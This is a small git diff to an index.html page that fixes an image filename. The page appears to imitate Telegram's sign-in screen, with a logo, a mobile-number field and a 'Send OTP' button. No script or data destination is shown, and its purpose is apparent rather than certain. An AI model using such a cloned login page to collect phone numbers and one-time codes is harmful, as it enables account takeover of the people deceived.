--- a/index.html
+++ b/index.html
@@ -43,7 +43,7 @@
 </head>
 <body>
     <div class="login-container">
-        <img src="Telegram Logo.png" width=300 height=300>
+        <img src="Telegram-Logo.png" width=300 height=300>
 		<h2>Sign in to Telegram</h2>
         <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13">
         <button onclick="sendOTP()">Send OTP</button>
